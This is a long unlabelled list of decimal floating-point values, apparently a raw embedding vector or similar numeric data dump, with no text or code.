0.010518883354961872, 0.01871448941528797, 0.026667792350053787, 0.022391824051737785, 0.02598363719880581, 0.008951027877628803, 0.0031410553492605686, 0.008138594217598438, 0.05729798227548599, -0.019997280091047287, 0.0031909416429698467, -0.03492041304707527, 0.016490986570715904, -0.001537567120976746, 0.04629448801279068, 0.0031214572954922915, 0.006941322702914476, 0.023403802886605263, -0.002382070990279317, -0.031072039157152176, -0.020538903772830963, 0.010540262795984745, -0.02397393248975277, -0.025698572397232056, -0.0022359753493219614, -0.029190612956881523, -0.01650523953139782, 0.0031553085427731276, 0.04948721081018448, 0.010440490208566189, -0.013647466897964478, -0.0540197379887104, 0.010369224473834038, 0.001300607225857675, -0.008566190488636494, 0.0057761212810873985, -0.014851865358650684, -0.026696298271417618, 0.008801368996500969, -0.0014493752969428897, -0.026354221627116203, -0.024016691371798515, 0.00515966909006238, 0.040108587592840195, 0.009998640045523643, -0.03537651523947716, 0.0022573552560061216, 0.019498417153954506, 0.03643125295639038, -0.011089012026786804, -0.033523596823215485, 0.04555331915616989, -0.02612616866827011, 0.025114189833402634, -0.009428511373698711, -0.02069568820297718, -0.010198185220360756, 0.02766551822423935, -0.03130009025335312, -0.010754061862826347, -0.012279157526791096, 0.001888552913442254, 0.00142621377017349, 0.015450500883162022, -0.005533816292881966, 0.0061146351508796215, 0.024230489507317543, 0.0020774081349372864, 0.010925100184977055, 0.015265208669006824, -0.013291136361658573, 0.03697287663817406, -0.013797125779092312, -0.018771503120660782, -0.008095834404230118, 0.006973392330110073, 0.02780804969370365, -0.02281942032277584, -0.02102351374924183, -0.012742387130856514, 0.00643533281981945, 0.009514031000435352, 0.026639286428689957, 0.009920247830450535, -0.02119455114006996, 0.02099500596523285, 0.013832759112119675, -0.048346955329179764, -0.0265395138412714, 0.0015927983913570642, 0.006232224404811859, -0.0015152964042499661, 0.00313749210909009, 0.00633912393823266, 0.016049135476350784, -0.014531167224049568, 0.0050100102089345455, -0.010796821676194668, -0.03668781369924545, -0.014709332957863808, 0.007169374264776707, 0.02978924848139286, -0.00997726060450077, -0.02105201967060566, 0.030245352536439896, -0.029960287734866142, 0.001181236351840198, 0.014880371280014515, 0.03201275318861008, 0.0012195418821647763, -0.004521836992353201, 0.03740047290921211, -0.005466113332659006, -0.035946644842624664, -0.004119183402508497, -0.008943901397287846, -0.01381850615143776, -0.003859061747789383, -0.03141411766409874, 0.01014117244631052, 0.018728744238615036, 0.03668781369924545, 0.03540502116084099, -0.02157938852906227, 0.019598189741373062, 0.014124950394034386, -0.0059578497894108295, -0.0055623226799070835, 0.0052772583439946175, 0.02683883160352707, 0.03215528652071953, -0.017246408388018608, 0.04053618386387825, -0.022477341815829277, 0.042702674865722656, 0.06653407216072083, -0.006702580954879522, -0.017987575381994247, -0.0004195794463157654, -0.02016831934452057, -0.023161496967077255, 0.00036902501597069204, -0.005501746665686369, -0.026938604190945625, -0.011074759066104889, 0.006264294497668743, 0.025698572397232056, 0.00968506932258606, -0.017816536128520966, -0.007974681444466114, 0.0071800644509494305, 0.001660501235164702, -0.005733361467719078, 0.03246885538101196, -0.024458540603518486, 0.03640274703502655, -0.0017950161127373576, -0.0003861734294332564, 0.03138561174273491, 0.018472185358405113, -0.03286794573068619, -0.006984082516282797, 0.004521836992353201, 0.0317561961710453, 0.010212439112365246, -0.0001798356679501012, -0.0009647654369473457, 0.03885430470108986, -0.012022598646581173, -0.02196422591805458, -0.012578475289046764, -0.01937013864517212, 0.009606676176190376, -0.02863473817706108, 0.023988185450434685, 0.01945565827190876, 0.028278406709432602, -0.01015542633831501, -0.0075755915604531765, 0.04974377155303955, 0.002838174346834421, -0.011217291466891766, 0.045752864331007004, -0.029304640367627144, -0.014238975942134857, -0.013112970627844334, 0.010055653750896454, -0.03286794573068619, 0.026525259017944336, -0.00043316456140019, -0.01132419053465128, -0.0034332466311752796, -0.010725555010139942, 0.012721006758511066, 0.009742082096636295, 0.010967859998345375, 0.01815861463546753, -0.0236746147274971, 0.0022912065032869577, -0.013711606152355671, 0.012471575289964676, 0.0029735800344496965, 0.032639894634485245, 0.03452132269740105, -0.00570485508069396, -0.00791054219007492, 0.02576983906328678, 0.003543709171935916, -0.004778394941240549, 0.00875148270279169, -0.06037667766213417, 0.006677637808024883, -0.008273999206721783, -0.022976204752922058, -0.017517218366265297, 0.009706448763608932, -0.015008650720119476, -0.0049529969692230225, -0.017175141721963882, 0.0027704713866114616, 0.003039501141756773, -0.0148661183193326, 0.012742387130856514, -0.008787116035819054, -0.02397393248975277, -0.019284619018435478, -0.007817896082997322, -0.026282954961061478, 0.017702510580420494, 0.013690226711332798, -0.0027651265263557434, -0.01204397901892662, 0.002574489451944828, -0.02281942032277584, -0.0060896920040249825, 0.010169679298996925, 0.008951027877628803, 0.011552242562174797, 0.008566190488636494, 0.012072484940290451, 0.011894320137798786, -0.02807886153459549, 0.02485763281583786, 0.019726470112800598, -0.026553766801953316, -0.01603488251566887, -0.005850950721651316, -0.012514335103332996, 0.034264761954545975, 0.017431698739528656, 0.0037200928200036287, 0.028321167454123497, 0.007162247784435749, -0.01579257845878601, 0.006609935313463211, -0.002763344906270504, -0.0015625102678313851, 0.009036547504365444, -0.017488712444901466, -0.03332405164837837, 0.028321167454123497, 0.022719647735357285, 0.004764141980558634, -0.018757250159978867, -0.007208570837974548, 0.02485763281583786, -0.0016453571151942015, -0.008523430675268173, 0.0025335114914923906, 0.016490986570715904, 0.005145415663719177, -0.024615326896309853, -0.01647673361003399, -0.02698136307299137, 0.019769228994846344, -0.017759524285793304, 0.005284384824335575, -0.024201983585953712, 0.007326160091906786, -0.0039766510017216206, 0.009984387084841728, -0.01747445948421955, -0.00791054219007492, -0.02394542470574379, -0.007539958227425814, 0.0016061607748270035, -0.024144969880580902, -0.002198560629040003, 0.024985911324620247, -0.007646857760846615, -0.05156818404793739, 0.022805167362093925, -0.0356045663356781, 0.02984626218676567, 0.029475677758455276, -0.03329554200172424, 0.040251120924949646, -0.025199709460139275, 0.006282110698521137, 0.00006664498505415395, 0.016248680651187897, 0.004888857714831829, 0.036773331463336945, -0.02155088260769844, 0.014139203354716301, -0.004129873123019934, 0.009863235056400299, 0.017289167270064354, -0.009414258413016796, -0.019683709368109703, -0.003028811188414693, -0.010497502982616425, -0.00373790948651731, -0.013241250067949295, 0.02993178181350231, -0.025883864611387253, -0.041761960834264755, -0.0009318048832938075, -0.0179448164999485, 0.04218955710530281, -0.004760578740388155, 0.0015384579310193658, -0.0043222918175160885, -0.0070945448242127895, -0.018728744238615036, -0.02783655747771263, 0.01851494424045086, -0.0025620178785175085, -0.043529361486434937, 0.04803338274359703, -0.021593643352389336, 0.01862897165119648, 0.017132380977272987, -0.02450130134820938, 0.03072996251285076, -0.03643125295639038, -0.01641971990466118, 0.010305085219442844, 0.03412223234772682, 0.031157558783888817, 0.0007683381554670632, 0.020296597853302956, -0.03802761435508728, 0.004482640419155359, -0.029561197385191917, 0.030416391789913177, 0.01527946162968874, -0.0015678552445024252, -0.023332536220550537, 0.0281358752399683, -0.012991818599402905, -0.00984898116439581, 0.023574842140078545, -0.03486339747905731, -0.01018393225967884, -0.02267688699066639, 0.01708962209522724, -0.0050884028896689415, 0.010618655942380428, 0.017374686896800995, 0.025228215381503105, 0.016704784706234932, 0.05638577416539192, 0.031813208013772964, -0.036773331463336945, 0.000493072671815753, 0.0047712684608995914, 0.0061716483905911446, 0.016547998413443565, 0.005501746665686369, 0.0168615709990263, -0.013376655988395214, 0.012542841956019402, -0.017046861350536346, -0.006349813658744097, -0.004803338088095188, 0.006029115989804268, -0.038483720272779465, -0.01868598349392414, -0.006663384847342968, -0.029190612956881523, -0.03221229836344719, -0.0026421924121677876, 0.005487493239343166, -0.031186066567897797, 0.016305694356560707, -0.01706111617386341, -0.05208130180835724, -0.006061185616999865, 0.007981808856129646, -0.002155801048502326, 0.017659751698374748, -0.022890686988830566, -0.010882340371608734, -0.021308578550815582, -0.015564526431262493, 0.005124035757035017, -0.0044790771789848804, -0.012100991792976856, -0.00950690358877182, 0.010789694264531136, -0.012471575289964676, -0.03939592465758324, -0.027423212304711342, -0.013875518925487995, 0.013918278738856316, -0.007272710092365742, -0.032611388713121414, 0.003039501141756773, -0.03301047906279564, -0.011773167178034782, -0.005687038414180279, 0.03326703608036041, 0.0018742996035143733, -0.003745035966858268, 0.003035937901586294, 0.03497742488980293, 0.00020589235646184534, 0.012421688996255398, 0.0148661183193326, -0.00005951836647000164, -0.02016831934452057, 0.015977870672941208, 0.0012382492423057556, -0.015407741069793701, -0.008509177714586258, -0.03549054265022278, 0.013704479672014713, 0.0015438029076904058, 0.041875988245010376, 0.0029290386009961367, -0.022862179204821587, 0.0013692008797079325, 0.02656801976263523, -0.007279837038367987, -0.01068992167711258, -0.012357549741864204, 0.0014306679368019104, 0.0029486368875950575, 0.0022555736359208822, 0.002986051607877016, -0.008067327551543713, -0.010219565592706203, 0.030074313282966614, 0.00950690358877182, -0.017659751698374748, -0.024144969880580902, -0.007468692027032375, -0.018771503120660782, -0.02976074256002903, 0.02267688699066639, 0.003198068356141448, 0.011808800511062145, -0.02618318237364292, 0.001766509609296918, 0.007561338134109974, -0.010647161863744259, -0.00515966909006238, -0.03155665099620819, -0.015464753843843937, 0.002150455955415964, -0.019056567922234535, -0.012115244753658772, -0.00648165587335825, -0.03990904241800308, 0.017289167270064354, -0.02105201967060566, -0.018643224611878395, -0.00833813939243555, 0.0211375392973423, -0.01027657836675644, 0.020054293796420097, -0.02122305892407894, -0.009699322283267975, -0.006032679229974747, 0.005669221747666597, -0.01523670181632042, -0.0034956044983118773, -0.006880746688693762, -0.02370312064886093, 0.02042487822473049, -0.023802893236279488, 0.0040550436824560165, 0.025456268340349197, 0.0003184705856256187, 0.037685539573431015, -0.018828516826033592, -0.01329826284199953, -0.018914034590125084, -0.025413507595658302, 0.009670816361904144, -0.023717373609542847, 0.02217802405357361, -0.023132991045713425, -0.01824413426220417, -0.018443679437041283, -0.00020611505897250026, 0.014089317061007023, 0.022063998505473137, -0.024273250252008438, 0.035148464143276215, -0.0017139507690444589, 0.013946784660220146, -0.008894015103578568, 0.03218379244208336, -0.016462480649352074, 0.013219870626926422, -0.015436246991157532, -0.005284384824335575, -0.013070211745798588, -0.014488407410681248, 0.0014761000638827682, -0.02356058731675148, 0.019199099391698837, -0.003958834335207939, 0.010889466851949692, -0.0014752092538401484, 0.008159973658621311, -0.011830179952085018, -0.0023998874239623547, -0.03893982246518135, -0.0211375392973423, -0.013326769694685936, -0.0011375858448445797, 0.006745340768247843, 0.0015438029076904058, -0.00713730463758111, 0.01948416419327259, 0.010668542236089706, 0.022562861442565918, 0.008202733471989632, -0.007725250441581011, 0.02394542470574379, -0.009435637854039669, 0.021180298179388046, 0.018443679437041283, -0.00043249642476439476, -0.0040301005356013775, 0.008302506059408188, 0.02491464465856552, -0.024786366149783134, 0.004447007551789284, 0.009692195802927017, 0.016747543588280678, 0.013497808016836643, -0.023688867688179016, -0.01081820111721754, -0.0027811613399535418, -0.010191058740019798, 0.017246408388018608, 0.028563471511006355, -0.001292589702643454, -0.037685539573431015, -0.025000164285302162, -0.0013727641198784113, 0.009421384893357754, -0.0010930445278063416, 0.0397380031645298, 0.017346180975437164, -0.010925100184977055, 0.03055892325937748, -0.028706002980470657, 0.042617157101631165, -0.002743746619671583, 0.027423212304711342, -0.02695285715162754, -0.0032426095567643642, 0.00897240824997425, 0.0025477646850049496, 0.012528588995337486, -0.01708962209522724, -0.040051575750112534, 0.02028234489262104, -0.004019410815089941, -0.022149518132209778, -0.022876432165503502, 0.007718123495578766, 0.02137984335422516, -0.004204702563583851, 0.025427760556340218, -0.01091084722429514, 0.006335560232400894, 0.0004961905651725829, -0.035946644842624664, 0.030102821066975594, -0.014160583727061749, -0.01036209799349308, -0.02353208139538765, 0.002205687342211604, -0.014666573144495487, -0.0008921630796976388, -0.030387884005904198, 0.000366352527635172, -0.0030804791022092104, -0.06123187392950058, 0.015436246991157532, -0.017645498737692833, -0.006791663821786642, 0.0007901634089648724, 0.01179454755038023, -0.0120012192055583, 0.015806831419467926, 0.005124035757035017, -0.0243302620947361, -0.027765290811657906, 0.007775136735290289, 0.025826850906014442, 0.07736653089523315, 0.02849220484495163, 0.006766720674932003, -0.008081581443548203, -0.01036209799349308, -0.007511451840400696, -0.008551937527954578, -0.0015536020509898663, 0.03221229836344719, -0.020453384146094322, 0.026881590485572815, -0.0032889326103031635, -0.016961343586444855, -0.0016996975755319, 0.005223808344453573, -0.03819865360856056, 0.0012266685953363776, -0.019355885684490204, -0.00650303578004241, 0.006959139369428158, -0.010718428529798985, -0.002945073414593935, 0.03209827095270157, -0.0008351501310244203, 0.005961413029581308, 0.0078107696026563644, 0.0040051573887467384, 0.008195606991648674, -0.01771676354110241, -0.00015344492567237467, 0.0028648991137742996, 0.017731016501784325, -0.012649741023778915, 0.012934805825352669, 0.008630330674350262, -0.000058571862609824166, 0.0029931780882179737, -0.008288253098726273, -0.00342077505774796, -0.011416836641728878, -0.0034261199180036783, -0.005441170185804367, 0.0033495088573545218, 0.0033049676567316055, -0.01523670181632042, -0.011666268110275269, 0.03751450031995773, 0.004254588857293129, -0.023403802886605263, -0.005687038414180279, -0.04247462376952171, -0.014980143867433071, -0.016405466943979263, 0.02993178181350231, -0.0037592891603708267, -0.007853529416024685, -0.01931312493979931, 0.012229270301759243, 0.0168615709990263, 0.008423658087849617, 0.004471950698643923, 0.019355885684490204, 0.0034956044983118773, -0.0017059333622455597, 0.008316759020090103, 0.005722671747207642, -0.011595002375543118, 0.017103875055909157, 0.0004716927942354232, 0.015393488109111786, 0.005337834358215332, -0.021123286336660385, 0.016932835802435875, 0.005220245104283094, 0.013326769694685936, 0.009207585826516151, -0.02509993687272072, 0.007076728157699108, -0.006574301980435848, 0.0009540755418129265, 0.0008752373396418989, 0.03292496129870415, -0.009250345639884472, -0.015806831419467926, -0.025028670206665993, 0.009157699532806873, -0.00843078549951315, -0.007817896082997322, 0.010084159672260284, -0.0007398317102342844, 0.016576506197452545, 0.010262325406074524, 0.00783927645534277, 0.03457833454012871, -0.01587809808552265, -0.010718428529798985, 0.01907082088291645, -0.026297207921743393, 0.014809105545282364, 0.003762852633371949, -0.007376046385616064, 0.0024782803375273943, 0.019170593470335007, 0.020011533051729202, -0.022691141813993454, 0.023959677666425705, -0.012329043820500374, 0.023075979202985764, -0.03480638563632965, 0.0018244133098050952, -0.020838221535086632, -0.02013981342315674, -0.000128835832583718, -0.029418665915727615, -0.008423658087849617, -0.0340082049369812, 0.007108798250555992, 0.030273858457803726, 0.003593595465645194, -0.005555196199566126, -0.008259746246039867, 0.00434010848402977, -0.0010404856875538826, 0.019256113097071648, -0.004389994777739048, 0.000054785850807093084, 0.004258152097463608, -0.011480975896120071, 0.018671730533242226, 0.02344656176865101, 0.01381850615143776, 0.0009001804864965379, 0.01031933818012476, -0.009414258413016796, 0.04236059635877609, -0.0061467052437365055, 0.015564526431262493, 0.005305764731019735, 0.0257413312792778, 0.00997726060450077, 0.004856788087636232, 0.045040205121040344, 0.0031570903956890106, 0.028648991137742996, 0.004308038391172886, -0.008779989555478096, -0.021265817806124687, -0.007347539532929659, 0.016605012118816376, -0.002150455955415964, -0.012036852538585663, -0.020396370440721512, 0.00791054219007492, 0.01570705883204937, 0.005558759439736605, 0.003780669067054987, 0.02890554815530777, -0.026240196079015732, -0.002184307435527444, 0.0044006844982504845, 0.01431736908853054, 0.03446430712938309, 0.016405466943979263, 0.0032693345565348864, -0.00007026396633591503, 0.009720702655613422, -0.0066740745678544044, -0.03711540997028351, -0.02397393248975277, -0.015037156641483307, 0.009357244707643986, 0.009827601723372936, -0.02993178181350231, -0.022520102560520172, 0.0015625102678313851, 0.015008650720119476, -0.00618590135127306, -0.020510397851467133, 0.02160789631307125, 0.003647044999524951, -0.0004926272667944431, 0.04324429854750633, -0.00314818206243217, -0.017346180975437164, 0.04082125052809715, -0.0005901727708987892, 0.010205312632024288, -0.0008226785575971007, -0.022121012210845947, 0.015193942002952099, 0.008779989555478096, 0.011887193657457829, -0.023161496967077255, -0.025057177990674973, -0.018671730533242226, -0.018757250159978867, 0.015265208669006824, 0.005783247761428356, -0.0014146330067887902, 0.014410015195608139, -0.009407131001353264, 0.01448128093034029, 0.010020020417869091, -0.0011179876746609807, 0.0068558030761778355, -0.04726370796561241, 0.02022533304989338, 0.015265208669006824, -0.014260356314480305, 0.008409405127167702, -0.011274304240942001, -0.003819865407422185, -0.003468879731371999, 0.0058545139618217945, 0.01091084722429514, -0.013761493377387524, 0.010262325406074524, -0.006014862563461065, 0.011787421070039272, 0.009057926945388317, -0.02403094433248043, 0.006923506036400795, -0.004710692446678877, 0.018372412770986557, 0.007112361490726471, 0.009492650628089905, 0.04444156959652901, -0.012778020463883877, 0.007860655896365643, 0.01527946162968874, 0.028477951884269714, 0.013034578412771225, 0.020154066383838654, 0.013284009881317616, -0.004304475151002407, 0.001534894690848887, -0.007561338134109974, -0.0025727078318595886, 0.003306749276816845, -0.010447616688907146, 0.0009736737119965255, 0.00947839766740799, -0.009841854684054852, -0.006410389672964811, -0.03055892325937748, -0.0000698742296663113, 0.022947698831558228, 0.039367418736219406, 0.014310242608189583, 0.010860960930585861, -0.02078120782971382, 0.004436317831277847, -0.011224417947232723, 0.002333966316655278, -0.00682017020881176, 0.03777105733752251, -0.002203905489295721, -0.0013807816430926323, 0.01744595356285572, -0.017346180975437164, 0.022976204752922058, 0.015307968482375145, -0.020838221535086632, -0.0017166233155876398, -0.020154066383838654, 0.024943150579929352, 0.010725555010139942, 0.021565135568380356, -0.0023695994168519974, 0.007425932679325342, 0.0019437841838225722, 0.01895679533481598, 0.0198690015822649, 0.019241860136389732, -0.031813208013772964, 0.010661415755748749, -0.009706448763608932, -0.040963780134916306, -0.0069662658497691154, -0.005651405546814203, 0.006659821607172489, 0.026168929412961006, 0.014246102422475815, -0.003142836969345808, 0.004147689789533615, 0.0034777880646288395, -0.011566495522856712, -0.006100382190197706, -0.024258995428681374, -0.016932835802435875, 0.01600637659430504, 0.004375741351395845, -0.007087418343871832, -0.0016025974182412028, 0.029090840369462967, -0.0013273319927975535, -0.006096818950027227, 0.02766551822423935, -0.007775136735290289, -0.0011580748250707984, 0.0015144055942073464, 0.020838221535086632, 0.004888857714831829, 0.004596666432917118, -0.004254588857293129, 0.004550343379378319, 0.010761188343167305, -0.011659141629934311, 0.004735635593533516, -0.0062250979244709015, 0.025142695754766464, -0.03415073826909065, -0.017374686896800995, -0.007775136735290289, -0.001791452756151557, 0.013661719858646393, -0.015935109928250313, 0.017759524285793304, 0.011901446618139744, -0.01039060391485691, 0.004076423589140177, 0.004831844940781593, 0.00704822177067399, -0.03802761435508728, -0.01411069743335247, -0.008894015103578568, -0.0032354830764234066, 0.006588555406779051, -0.0006761375698260963, -0.013690226711332798, 0.012200764380395412, 0.00947839766740799, 0.012721006758511066, 0.0085020512342453, 0.012343296781182289, -0.017146635800600052, 0.005658532027155161, 0.002515695057809353, -0.025841103866696358, -0.006513725966215134, -0.015393488109111786, 0.011808800511062145, -0.011181658133864403, 0.013234123587608337, 0.001406615599989891, 0.006324870511889458, 0.03580411151051521, 0.01909932680428028, 0.006446023005992174, -0.0002668026427272707, -0.01237180270254612, -0.015350728295743465, -0.023931171745061874, 0.009649435989558697, -0.0120012192055583, 0.012956185266375542, -0.01111751887947321, 0.0035205476451665163, 0.016904329881072044, -0.003217666409909725, -0.031699180603027344, 0.03454982861876488, -0.010974986478686333, -0.032782427966594696, -0.017545726150274277, 0.027209414169192314, -0.031898725777864456, -0.005526689812541008, -0.02309023216366768, -0.017146635800600052, -0.013512060977518559, 0.01606339029967785, 0.012093865312635899, 0.021764680743217468, 0.002672480419278145, -0.010889466851949692, 0.043529361486434937, -0.0230617243796587, -0.0008093161741271615, 0.03497742488980293, 0.0064638396725058556, -0.0010957169579342008, 0.003994467668235302, 0.0015865626046434045, -0.03891131654381752, -0.017075369134545326, -0.009970134124159813, -0.019056567922234535, 0.010369224473834038, 0.013355275616049767, -0.005501746665686369, 0.0000957082083914429, -0.014752092771232128, 0.02193571999669075, -0.005580139346420765, 0.019298871979117393, 0.012849286198616028, 0.006182338111102581, -0.020524650812149048, 0.014752092771232128, -0.007596971001476049, 0.013569074682891369, -0.015692805871367455, 0.011438216082751751, 0.016106149181723595, -0.008922521956264973, -0.008530558086931705, -0.028235647827386856, 0.03389417752623558, -0.00029464098042808473, 0.013319643214344978, -0.004297348670661449, 0.016776051372289658, -0.005551632959395647, -0.021251564845442772, -0.002426612190902233, -0.012272030115127563, -0.00684155011549592, -0.016818810254335403, 0.022463088855147362, 0.01603488251566887, 0.005466113332659006, -0.02722366712987423, -0.00513828918337822, 0.03332405164837837, -0.002421267330646515, 0.012528588995337486, -0.023802893236279488, -0.003636355046182871, 0.01874299719929695, 0.005170358810573816, 0.022862179204821587, 0.012913425453007221, 0.02978924848139286, 0.00019509108096826822, -0.008858381770551205, 0.0006699017831124365, -0.004703565500676632, -0.017602737993001938, -0.005145415663719177, -0.0068023535422980785, -0.01747445948421955, -0.013098717667162418, -0.0029735800344496965, 0.023760132491588593, -0.020296597853302956, 0.009613803587853909, -0.011552242562174797, -0.0078677823767066, -0.015906604006886482, 0.014752092771232128, 0.003908948041498661, 0.006342687178403139, 0.012827906757593155, -0.0015607286477461457, -0.018172867596149445, 0.03859774395823479, -0.009243219159543514, -0.008352392353117466, -0.002209250582382083, 0.021337084472179413, -0.018386665731668472, 0.025028670206665993, -0.017902055755257607, 0.01402517780661583, 0.00704822177067399, -0.006916379556059837, -0.018814262002706528, 0.005434043705463409, -0.02063867636024952, 0.03130009025335312, -0.00477483170107007, -0.0031054222490638494, 0.005886583589017391, 0.009820475243031979, 0.019583936780691147, -0.015208195894956589, -0.01204397901892662, -0.0072050075978040695, 0.02391691878437996, 0.013127224519848824, 0.003855498507618904, -0.01706111617386341, -0.004803338088095188, -0.006264294497668743, 0.02739470638334751, 0.0070696016773581505, 0.031955741345882416, 0.006994772236794233, 0.01490887813270092, -0.004147689789533615, 0.00011402583186281845, -0.011480975896120071, 0.013248376548290253, 0.009364372119307518, 0.016334200277924538, 0.0036951496731489897, 0.018557704985141754, 0.021151792258024216, -0.014837611466646194, -0.009941627271473408, -0.0046073561534285545, 0.0008894905913621187, -0.028834283351898193, 0.030958013609051704, 0.00009465034963795915, -0.001663173665292561, 0.00021558009029831737, 0.02562730573117733, -0.010682795196771622, 0.005056333262473345, -0.0026511007454246283, -0.0039517078548669815, 0.02648250013589859, -0.00018573740089777857, -0.010889466851949692, -0.004350798204541206, 0.0013977072667330503, -0.01238605659455061, 0.0067239608615636826, 0.014752092771232128, -0.005526689812541008, 0.01708962209522724, -0.018258387222886086, 0.013134351000189781, -0.004678622353821993, -0.006688327994197607, 0.011502356268465519, -0.01892828941345215, -0.0157355647534132, 0.015892351046204567, 0.0013077338226139545, -0.005872330628335476, 0.0023838526103645563, -0.005651405546814203, -0.012229270301759243, 0.021949972957372665, -0.006495909299701452, 0.009449890814721584, -0.02438727580010891, -0.005626462399959564, -0.014452774077653885, -0.01862897165119648, -0.009528283961117268, 0.0036417001392692327, -0.014666573144495487, 0.026211688295006752, -0.01406793761998415, -0.005120472516864538, -0.0007246876484714448, -0.012628361582756042, 0.0004126755229663104, -0.020154066383838654, -0.0003621211217250675, 0.00005807077468489297, 0.008053074590861797, 0.0077323769219219685, 0.009784841910004616, -0.025912370532751083, 0.0018956795101985335, -0.0013308952329680324, -0.006998335476964712, 0.02320425771176815, 0.02805035561323166, 0.03637424111366272, -0.011887193657457829, -0.010882340371608734, 0.018144361674785614, 0.010255198925733566, -0.011131771840155125, 0.004682186059653759, 0.009713576175272465, 0.0005603300523944199, -0.000115250724775251, -0.004910237621515989, -0.0075185783207416534, -0.005826007574796677, -0.011630634777247906, 0.026268702000379562, -0.025883864611387253, 0.015749817714095116, -0.0036238834727555513, -0.018372412770986557, -0.0043472349643707275, -0.004721382167190313, 0.00311433058232069, -0.0024230489507317543, -0.0026136860251426697, -0.0166762787848711, 0.0012400309788063169, 0.014174836687743664, -0.029333146288990974, -0.001665846211835742, -0.03500593081116676, -0.012236397713422775, -0.017902055755257607, -0.02290493994951248, -0.0048746042884886265, -0.007497198414057493, 0.021750427782535553, 0.007782263215631247, -0.0007923904922790825, -0.014288862235844135, 0.003499167738482356, -0.010397730395197868, 0.002435520524159074, 0.028862789273262024, -0.016020629554986954, -0.025071430951356888, -0.007974681444466114, 0.004279532004147768, -0.021123286336660385, -0.007208570837974548, 0.0011945987353101373, 0.021265817806124687, 0.021322831511497498, 0.013882645405828953, 0.008181354030966759, -0.015892351046204567, -0.006075439043343067, 0.0070945448242127895, 0.02163640223443508, -0.008737229742109776, -0.0005567667540162802, 0.0017816536128520966, 0.015407741069793701, 0.019355885684490204, -0.0009300232050009072, -0.0008249056409113109, 0.006136015057563782, 0.00652441568672657, 0.02388841286301613, -0.0028791523072868586, 0.016719037666916847, -0.0012908080825582147, 0.022420329973101616, -0.012728134170174599, 0.01587809808552265, 0.004593103192746639, 0.00016814356786198914, -0.003187378402799368, -0.02061017043888569, 0.013362402096390724, 0.016305694356560707, -0.008808495476841927, 0.0009130975231528282, -0.008273999206721783, -0.03158515691757202, 0.011680521070957184, 0.0049316175282001495, -0.000963874626904726, 0.023304030299186707, -0.0018618280300870538, 0.02261987514793873, -0.002269826829433441, -0.03417924419045448, -0.00545542361214757, -0.00870872288942337, 0.0004574395716190338, 0.016405466943979263, -0.0032889326103031635, 0.0022324121091514826, 0.019142087548971176, 0.005897273775190115, 0.023432308807969093, 0.02102351374924183, 0.012300536967813969, -0.002989614848047495, 0.027237921953201294, 0.01431736908853054, -0.0011856905184686184, 0.009984387084841728, -0.009278852492570877, -0.0033441639970988035, -0.0039267647080123425, -0.007044658530503511, -0.007525705266743898, -0.008031695149838924, -0.011994092725217342, 0.002585179405286908, -0.006927069276571274, -0.002292988356202841, 0.006574301980435848, -0.0033976135309785604, -0.00425102561712265, 0.0012266685953363776, -0.002309023169800639, -0.005205992143601179, 0.012215017341077328, -0.026254449039697647, -0.005512436386197805, -0.009649435989558697, -0.005284384824335575, 0.008951027877628803, -0.008986661210656166, -0.015906604006886482, -0.009250345639884472, 0.0064317695796489716, 0.012435942888259888, 0.014124950394034386, -0.0024194857105612755, -0.010119793005287647, 0.0047962116077542305, 0.03566157817840576, -0.02521396242082119, 0.01895679533481598, -0.00027682443032972515, -0.00445769727230072, 0.019227607175707817, -0.000941603968385607, 0.045068711042404175, 0.004924490582197905, 0.008437911979854107, 0.019270366057753563, -0.003730782773345709, 0.005067022982984781, -0.006289237644523382, -0.01153086218982935, 0.004222519230097532, 0.016220174729824066, 0.0045824130065739155, 0.036089178174734116, 0.010055653750896454, 0.002930820221081376, -0.010240945033729076, -0.019028062000870705, -0.011894320137798786, -0.003688023192808032, -0.02408795803785324, 0.0018653913866728544, 0.02775103785097599, -0.005255878437310457, 0.018372412770986557, -0.0017344398656859994, -0.00002652993680385407, 0.010454744100570679, 0.0011660923482850194, -0.040963780134916306, -0.021693415939807892, -0.0029664533212780952, 0.029162107035517693, 0.014046557247638702, 0.004760578740388155, 0.008851255290210247, -0.009250345639884472, -0.006160958204418421, -0.004871041048318148, 0.005701291840523481, -0.021679161116480827, 0.016134655103087425, 0.0002643528569024056, 0.008224112913012505, 0.012478702701628208, 0.02028234489262104, -0.0035989403259009123, 0.007504325360059738, -0.011858686804771423, -0.0016898985486477613, 0.009264598600566387, 0.0016230865148827434, 0.008181354030966759, 0.029418665915727615, 0.00024943152675405145, 0.00891539454460144, 0.03905384987592697, 0.029219120740890503, -0.007219260558485985, -0.00905080046504736, -0.02264838106930256, -0.010967859998345375, 0.004917364101856947, 0.013070211745798588, 0.00513828918337822, 0.0170041024684906, 0.011694774962961674, 0.004414937924593687, 0.002223503775894642, -0.00711592473089695, -0.0069662658497691154, 0.013761493377387524, 0.01650523953139782, -0.0014101788401603699, 0.01969796232879162, 0.010005766525864601, 0.016519492492079735, -0.005590829066932201, 0.006214408203959465, 0.006289237644523382, 0.008993787690997124, -0.035176970064640045, -0.001568746054545045, -0.002481843577697873, -0.004514710512012243, -0.001877862960100174, -0.020952247083187103, -0.038483720272779465, 0.006168085150420666, 0.017132380977272987, -0.018044589087367058, -0.00909356027841568, 0.0058295708149671555, -0.009114939719438553, -0.014295988716185093, 0.00905080046504736, 0.01111751887947321, 0.010411984287202358, -0.00673108734190464, 0.026496753096580505, 0.002615467645227909, 0.012108118273317814, -0.016547998413443565, 0.035861123353242874, -0.004179759416729212, 0.00905080046504736, -0.005715544801205397, 0.009285978972911835, -0.00346531649120152, -0.00704822177067399, 0.003133928868919611, -0.0042189559899270535, -0.010077033191919327, -0.02028234489262104, 0.020040040835738182, -0.00800318829715252, -0.0016988067654892802, 0.013754365965723991, 0.012143751606345177, -0.02063867636024952, 0.01178029365837574, -0.0003986450028605759, 0.0004774831759277731, 0.005020699929445982, 0.02350357547402382, -0.014452774077653885, -0.006446023005992174, 0.011495229788124561, -0.00370583962649107, -0.013982417993247509, 0.003194505115970969, 0.01945565827190876, -0.0044256276451051235, -0.00226270011626184, 0.00833813939243555, -0.01118878461420536, -0.006916379556059837, 0.00370583962649107, 0.006766720674932003, 0.006642004940658808, -0.006716834381222725, 0.005904400255531073, 0.01998302713036537, 0.00026368474937044084, 0.005833134055137634, -0.011787421070039272, 0.01889978162944317, -0.00984898116439581, 0.009114939719438553, -0.022691141813993454, -0.01111751887947321, -0.00484253466129303, 0.022306304425001144, 0.0056478423066437244, 0.014531167224049568, -0.012806526385247707, 0.014153456315398216, 0.03554755449295044, -0.029618211090564728, -0.0034670981112867594, -0.01727491430938244, -0.013675973750650883, 